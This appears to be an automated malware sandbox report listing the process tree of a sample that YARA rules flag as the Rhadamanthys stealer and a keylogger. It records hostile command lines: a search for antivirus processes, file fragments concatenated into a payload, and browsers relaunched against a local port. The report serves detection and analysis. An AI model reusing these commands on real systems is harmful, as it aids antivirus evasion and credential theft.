                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0x930000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                        Start time:08:54:47
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                        Imagebase:0x250000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                        Start time:08:54:47
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c md 407310
                                                                                                                                                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                        Start time:08:54:47
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B
                                                                                                                                                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                        Start time:08:54:47
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:Hop.com B
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68c430000
                                                                                                                                                                                                                                                                                                        File size:1'065'128 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                        Start time:08:54:48
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                        Imagebase:0x570000
                                                                                                                                                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                        Start time:08:54:59
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\407310\Hop.com
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68c430000
                                                                                                                                                                                                                                                                                                        File size:1'065'128 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                                        Start time:08:55:00
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\407310\Hop.com
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68c430000
                                                                                                                                                                                                                                                                                                        File size:1'065'128 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                                        Start time:08:55:06
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                                        Start time:08:55:07
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff754190000
                                                                                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                                        Start time:08:55:24
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                                        Start time:08:55:25
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                        Start time:08:55:26
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                                        Start time:08:55:28
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                                        Start time:08:55:28
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                        Start time:08:55:29
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                                        Start time:08:55:32
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                                        Start time:08:55:32
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                        Start time:08:55:32
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                        Start time:08:55:33
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                                        Start time:08:55:34
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                        Start time:08:55:51
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff668750000
                                                                                                                                                                                                                                                                                                        File size:171'008 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                        Start time:08:55:56
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7782e0000
                                                                                                                                                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:28
